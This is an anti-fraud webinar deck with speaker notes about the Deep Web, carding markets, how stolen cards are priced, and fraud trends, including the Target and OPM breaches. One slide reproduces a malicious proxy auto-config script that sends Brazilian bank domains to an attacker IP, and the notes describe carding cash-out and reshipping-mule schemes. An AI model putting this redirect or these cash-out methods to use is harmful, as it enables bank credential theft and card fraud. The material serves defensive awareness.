The Deep Web - What's Lurking in the Deep End of the Internet
•
5 gefällt mir•1,722 views
Like an iceberg, the vast majority of the Internet is obscured from view. This unindexed section of the Internet is dubbed “the Deep Web.” The recent evolution of the Deep Web has allowed fraud to become increasingly commoditized as new methods continue to emerge to monetize the fraud process. As it continues to mature, we expect to see increasingly sophisticated fraud based on the ability to mine the Deep Web for a variety of information. In this webinar, we will discuss the current state of fraud evolution and provide an understanding of how the business of fraud is structured, including an exclusive view of stolen credit card black markets. Attendees will learn: -- How the “Deep Web” is utilized as an enabler of fraud that targets corporations -- Emerging fraud trends in 2015 and beyond -- Best practices for how to tackle fraud from beginning to end Watch the replay here: http://www.easysol.net/resources-the-deep-web
Empfohlen
Empfohlen
Weitere ähnliche Inhalte
Andere mochten auch
Andere mochten auch (12)
Kürzlich hochgeladen
Kürzlich hochgeladen (20)
The Deep Web - What's Lurking in the Deep End of the Internet
- 1. What’s lurking in the deep end of the Internet? The DeepWeb Joshua Schleicher Anti-Fraud SolutionsConsultant info@easysol.net
- 2. 95% of the ocean remains unexplored, unseen by human eyes http://oceanservice.noaa.gov/facts/exploration.html
- 3. Just like an iceberg, the majority of the Deep Web remains obscured from view
- 4. Google has only indexed 200TB of the Internet's data...an estimated .004% of the total Internet Source: https://hewilson.wordpress.com/what-is-the-deep-web/statistics/
- 5. Source: http://money.cnn.com/infographic/technology/what-is-the-deep-web/ These search engines capture < 1% of all web content
- 7. The Deep Web is truly anonymous– you can’t even get on it unless you yourself are anonymous
- 8. Users can buy virtually anything from drugs to credit card information and accounts
- 10. The recent evolution of the DeepWeb has allowed fraud to become increasingly commoditized, simply because there are many ways to monetize the fraud process itself.
- 11. The Process Information Theft Black Market Sale
- 13. Cybercrime Platforms > Data Stealer SDK > VOLK > Webshells > Zeus > SpyEye > Citadel > ICE IX > BlackHole Exploit Kit > iBanking (Mobile Botnet) > Malware Targeting POS
- 14. Mobile Crimeware Platforms are being used to harvest credentials to infiltrate accounts.
- 15. PAC (Proxy Autoconfiguration) Attacks function FindProxyForURL(url, host) { // ---- Santander if (shExpMatch(host, "www.santander.com.br")) { return "PROXY 201.20.46.177:80"; } if (shExpMatch(host, "santander.com.br")) { return "PROXY 201.20.46.177:80"; } if (shExpMatch(host, "www.banespa.com.br")) { return "PROXY 201.20.46.177:80"; } if (shExpMatch(host, "banespa.com.br")) { return "PROXY 201.20.46.177:80"; } }
- 16. Fraudsters have succeeded at breaching big-name merchants
- 17. The Process Information Theft Black Market Sale
- 18. Easy Checkout . Customer Support . Money Back Gurantee Technical Support Shopping Online with the Deep Web
- 19. The Hidden Wiki Resource for finding hacking databases and credit card sale sites
- 21. Factors affecting Price: • Validity Rate • Supply and Demand • Issuing Region How much is a card worth? Source: http://krebsonsecurity.com/2014/02/fire-sale-on-cards-stolen-in-target-breach/
- 22. How much is Healthcare data worth? In 2015 – The cost of just one Medicare number, $470 Source: http://www.npr.org/sections/alltechconsidered/2015/02/13/385901377/the- black-market-for-stolen-health-care-data
- 23. Cashing In Image Source: http://www.tripwire.com/state-of-security/vulnerability-management/how-stolen-target- credit-cards-are-used-on-the-black-market/
- 24. Silk Road The most famous online drug market that was shut down in 2013 by the FBI
- 25. Down the Rabbit Hole, The Front Door
- 26. Welcome to the Jungle
- 27. Welcome to the Jungle
- 28. Welcome to the Jungle
- 29. Welcome to the Jungle IRS & the Federal Office of Personnel Management recently fell victim to breaching and Deep Web information trading.
- 30. Welcome to the Jungle
- 31. My Two Cents • Tackle the problem from beginning to end • Look for constant innovation • Speed and flexibility are critical when fighting back fraud • Ask for references – especially when something bad happens • There is no silver bullet
Hinweis der Redaktion
- Throughout history, the ocean has been a vital source of sustenance, transport, commerce, growth, and inspiration. Yet for all of our reliance on the ocean, 95 percent of this realm remains unexplored, unseen by human eyes. http://oceanservice.noaa.gov/facts/exploration.html
- The Deep Web is a collection of different web sites, academic databases, corporate intranets and also criminal databases, marketplaces and forums. The owners of each site have different incentives, from guarding intellectual property to hiding criminal activity from law enforcement. Read more: http://www.cheatsheet.com/business/a-look-inside-the-deep-web.html/?a=viewall#ixzz3cmJhoOmN
- Exactly how large is the Deep Web? If the glacier analogy did not make a big enough impact on the imagination, the following statistics from should help put the immensity of the Deep Web into perspective. – The Deep Web has between 400 and 550 times more public information than the Surface Web. – Together, the 60 largest Deep Web sites contain around 750 terabytes of data, surpassing the size of the entire Surface Web 40 times. – 550 billion individual documents can be found on the Deep Web compared to the Surface Web’s 1 billion individual documents. Source: https://hewilson.wordpress.com/what-is-the-deep-web/statistics/
- Search engines like google and bing crawl the web and index linkable sites. This allows casual internet users to find the majority of the content that people use on a daily basis These search engines capture less than 1% of all web content. Things like databases and private academic journals are often not indexed by these search engines, and these make up a considerable amount of data content on the internet. This content is available via targeted browsing or behind paywalls in the case of academic resources.
- The main topic of discussion today is going to be the deepest part of the internet, known as the deep web or dark web, among other names The deep web is only accessible using specific, anonymizing technologies and is the portion of the internet that houses the most sinister functions of the internet, such as forums for the distribution of illegal drugs, pornography, and stolen goods.
- The deep web is truly anonymous, you can’t even get on it unless you yourself are anonymous Your location and browsing habits cannot be picked up Can only be accessed through a deep web browser, not a normal browser such as Firefox Most popular browser is called Tor http://www.sickchirpse.com/deep-web-guide/
- Deep Web is filled with illegal things such as drugs, can hire a hitman, weapons, credit card information Can get access to business credit card accounts and infinite credit card accounts Most things on the deep web are paid for with bitcoins that uses a similar system such as Paypal: uses cryptography, the practice of hiding information, to oversee the transfer of money Transactions are irreversible and verified within anywhere between 10 minutes to an hour. The Bitcoin network is decentralized, making these transactions solely peer-to-peer. Exchange rate changes from day to day. Encourages illegal behavior because the authorities cannot track where the money goes.
- Downloads of deep web browsers soared in August by almost 100% as the general population became more concerned about privacy amid talk of US intelligence agencies monitoring web traffic http://www.sickchirpse.com/deep-web-guide/2/
- In order for credentials to be sold on the Deep Web, credentials must first be harvested and there are a variety of means for this to be accomplished. We are seeing increased complexity in the methods used by fraudsters to harvest credentials, from routine “mass” phishing schemes to more targeted blended malware attacks.
- Here are some examples of advanced malware that can be used to compromise accounts and harvest credentials. Theft of information is done in a wide variety of ways, but large-scale data breaches form the foundation of the black market economy formed around payment card fraud. Recent breaches have been the result of malware that has been placed on Point of Sale systems, often in situations where the breached organizations have been certified by 3rd parties as having the appropriate security controls in place These generally occur on secured and segmented internal networks, which require the fraudsters to perform multiple levels of infiltration to reach the POS systems Access Internal Network, map network and identify secured payments segment, then infect POS terminal devices This is a sophisticated attack Recent breaches have also employed RAM-scraping malware for collection of unencrypted, plain-text CC data as it passes through the POS machine memory. Data Exfiltration In order to collect the data, it must then be extracted from the internal network. This requires the fraudsters to bypass additional security controls such as Data Loss Prevention tools and outbound firewall rules. Bypassing these security controls can involve an additional piece or pieces of malware designed with the intent of storing and moving data from the internal networks through the firewall. Once the data leaves the internal network it is transferred to a drop site, which is frequently a simple FTP server controlled by the fraudster. The Target breach, for example, employed 3 pieces of malware, both known and unknown. Several of these installations were detected by an existing Intrusion Detection System, but these alerts were ignored. 11 GB of data was ultimately extracted in this manner during the course of the Target breach.
- As mobile increase in popularity, we are seeing it targeted more as a means to harvest credentials. Crimeware platforms can be used to find second factors of authentication, such as SMS, to infiltrate accounts.
- A user is infected through a drive-by attack or by other malware and a malicious PAC file is installed onto their computer. When the victim visits a targeted website, their browser is redirected to a fake website that will record their login details. The infection is silent, the user is not notified of the change in configuration. The web site will look almost completely legitimate. http://blogs.technet.com/b/mmpc/archive/2014/02/28/malicious-proxy-auto-config-redirection.aspx
- After several years of a relatively low-and-slow assault on retail point-of-sale systems, fraudsters have succeeded at breaching several big-name merchants. And as a result, their crimes are now considered mainstream news. People who never considered payments security before are now talking about POS, PCI and EMV.
- Finding information on the Deep Web is easy, many sites are equipped much like legitimate sites with customer service, easy checkout, technical support and even money back guarantees!
- The first thing a credit card buyer would focus on is finding a place to purchase from. This is relatively easy, as there are resources such as the Hidden Wiki to help: The Hidden Wiki Comparable to Wikipedia Can find links to hacking databases Also a way to find credit card sale sites and forums, which are a major problem for financial institutions around the globe. Let’s expand on the market for stolen credit card data.
- The sale of credit card information is done in various ways, but recent years have seen the rise of online card shops that are designed to provide a forum for sellers and buyers to meet and exchange these numbers in a secure manner. Previously the more common way was to contact sellers via ICQ or Jabber clients, but this seems to have given way to the even more anonymized carding sites These shops also leverage crypto currencies such as Bitcoin to further anonymize the financial transactions on the site These shops provide detailed information on each card or group of cards being purchased, including information on issuing bank, cardholder, and BIN These shops also use names for large-scale influxes of cards as a sort of marketing tool to entice buyers to purchase the most effective card dumps Names like Barbarossa, Tortuga, and Tripoli Recently these forums have been found to be employing tactics that are really only seen in the large retailers they steal from, such as one-click buying, easy checkout, robust customer service, and instant refunds for customers that purchase a card number that has been cancelled by the issuer. <Click through to graphic> In summary, the markets and forums in which stolen payment card data is sold is becoming increasingly more sophisticated, and this trend will only continue as large-scale data breaches become more prevalent
- Factors that affect the price of a stolen card: Validity Rate – the older a breach is, the more likely the card is to have been cancelled. The above graphic illustrates the rapid decline in validity rates for the Target breach over time, which correlates directly to the average prices for the cards being sold. Supply and Demand – As in any economy, the main forces driving the price of the commodity are supply and demand. In the case of large breaches like Target, the cards were placed on carding sites and forums over time in several batches to increase salability. Region – While this variance is also explained by supply and demand, the fact of the matter is that Based on this information, cards can be worth anywhere from $1 to $120, with European cards from new breaches fetching the highest prices per card. The large variance in the aforementioned factors accounts for the large range of prices.
- 22 Bitcoins, exchange rate at the time of sale. Valid seller with 5 star rating!!
- There are any number of methods of cashing in on stolen credit card information, from the very simple to the very complex. The most simple would be a simple ATM transaction for a debit card which was stolen and sold with available PIN information The Credit to Gift Card Shell Game – Find the Fraud! One lucrative method of “carding” involves a shell game, where stolen credit cards are used to charge pre-paid cards. These cards are then used to purchase store specific gift cards, such as from Amazon for example. Shopping & Reshipping The carder then uses that gift card to purchase high value goods, usually electronics such as cell phones, computers and game consoles. This process makes it difficult for companies to trace. By the time it is figured out and the cards blocked the criminal is in possession of the purchased goods. These packages are usually then shipped via a re-shipping scam. Unsuspecting individuals are recruited as Mules (re-shippers) usually through legitimate channels such as Craigslist job listings promising “easy work-from-home jobs” and usually in the United States as it raises fewer red flags. The re-shipper then assembles multiple packages and ships them usually outside the country, or directly to someone who purchases the goods from an auction site the fraudster has posted the goods to. Reselling Goods for Profit The carder may then sell the electronics through legitimate channels such as through eBay, or to avoid risk can sell the goods through a hidden underground “deep web” site. Most people know the “deep web” from the Silk Road, which was recently shut down by the FBI, reappeared and then vanished again. The Silk Road was a marketplace for illegal products such as drugs online. However the Silk Road had somewhat of a code of ethics, as certain products were restricted from sale such as pornography, weapons, personal data (stolen credit cards, passwords etc), poisons, or weapons. There are many hidden services available that do not have such scruples. There are numerous places on the deep web that sell stolen credit cards and goods acquired through carding. On these hidden illegal websites the goods are usually sold at deep discounts on the black market, usually around 50% of retail and reshipped or sent to a secure drop (vacant house etc) a purchaser has setup for this purpose.
- Silk Road was the most famous online drug market until the FBI shut it down in 2013: 97% success rate, meaning 97% of all transactions were completed successfully Set up like eBay or Amazon, with a heavy focus on user feedback for buyers and sellers Been open since 2011 Buy virtually any kind of drug in any quantity you desire
- Accessing the Deep Web is relatively simple through use of a TOR Browser, short for “The Onion Router”. The TOR network effectively anonymizes users and services by moving their traffic across numerous TOR network servers and by encrypting the traffic data so that it cannot be traced. Anyone attempting to view or analyze the traffic simply sees traffic coming from random nodes on the TOR network as opposed to the traceable IP information that would identify users browsing the common internet.
- The deep web is also the place to encounter professional hackers and fraudsters for hire, who can perform a wide variety of attacks to compromise a target of your choice. All transactions are conducted with cryptocurrencies, and the services available may include: Account Takeover for social media or banking sites Tracking of mobile devices for surveillance Webserver hacking or DDOS attacks Even tracking of someone who committed fraud against you – FIND YOUR SCAMMER The availability of these services has created a world in which you do not need “blackhat” hacking skills to run attack campaigns but instead only the ability to pay for a phishing or malware kit. This has been an important aspect in the proliferation of cyber attacks against corporations and financial institutions around the world.
- If we are viewing the deep web as a sort of illegal goods superstore, then one of the more common goods to find there would be firearms. Prohibition or restriction on the purchase of firearms varies worldwide, and as a result black markets are created to illegally bypass those restrictions. Dark web operators sanitize the firearms by removing serial numbers and then sell to anyone with the cash to pay for the weaponry. Items sold on the dark web include firearms that are restricted from being sold to the public, such as fully automatic or high-caliber weaponry, to more common weapons being sold to criminals or other individuals who are restricted from purchasing firearms in their country.
- Fake documents are also widely available on the deep web, and many of these vendors claim to be able to furnish fully functional passports, drivers licenses and social security numbers for people looking to falsify citizenship or enter a country under false pretenses. This is clearly a significant concern for those governments who are fighting against problems like terrorism and large-scale drug trade, as they often use border checkpoints to monitor the movement of key individuals around the globe. Often the generation of these documents can lead back to breaches of government or healthcare sites that contain Social Security numbers that can then be used to generate fake documents.
- While corporate breaches often grab the most significant headlines, governmental organizations are also vulnerable to attacks that lead to information being sold on the deep web black markets. Earlier this year, the IRS encountered over 200,000 attempts to file falsified tax returns, and found that over one hundred thousand accounts had been compromised, which included personal information such as SS#, DOB and Street Address. In these instances, the criminals were able to get around the multi-step authentications with personal information about the tax payer And just recently the federal Office of Personnel Management was breached, potentially exposing the private data of over 4.1 million federal government employees (over 2 decades) this includes extremely sensitive data and personal information and has already been discovered being actively traded in the darknet Criminals will parse out the most valuable data and sell to interested parties; much as they do with CCs that are sold in batches.